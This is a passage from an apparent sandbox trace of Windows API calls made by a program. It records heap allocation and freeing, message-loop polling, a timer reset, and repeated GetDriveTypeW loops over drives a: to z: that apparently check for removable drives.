GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.205] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.205] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.205] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.206] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.206] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.206] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.206] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.207] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.207] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.207] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.207] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.207] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.208] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.208] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.209] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0216.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0216.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0216.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.210] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.210] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.211] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0216.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.212] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.212] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.212] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.212] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.212] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.213] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.213] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.213] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.213] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.214] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.214] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.214] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.214] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.214] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.215] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.215] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.215] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.215] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.215] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.216] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.216] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.216] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.216] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.216] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.217] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.217] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.217] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.218] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0216.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0216.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0216.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.219] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0216.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.219] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.220] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0216.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.221] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.221] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.221] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.221] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.221] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.222] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.222] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.222] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.222] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.222] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.223] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.225] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.225] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.225] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.225] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.225] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.226] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.226] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.226] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.226] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.230] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.230] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.583] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.583] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.583] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.583] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.583] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0216.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.584] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.584] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.584] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.584] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.584] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0216.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0216.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0216.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0216.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.586] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.586] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.586] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.586] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0216.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0216.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0216.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.587] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.587] GetDriveTypeW 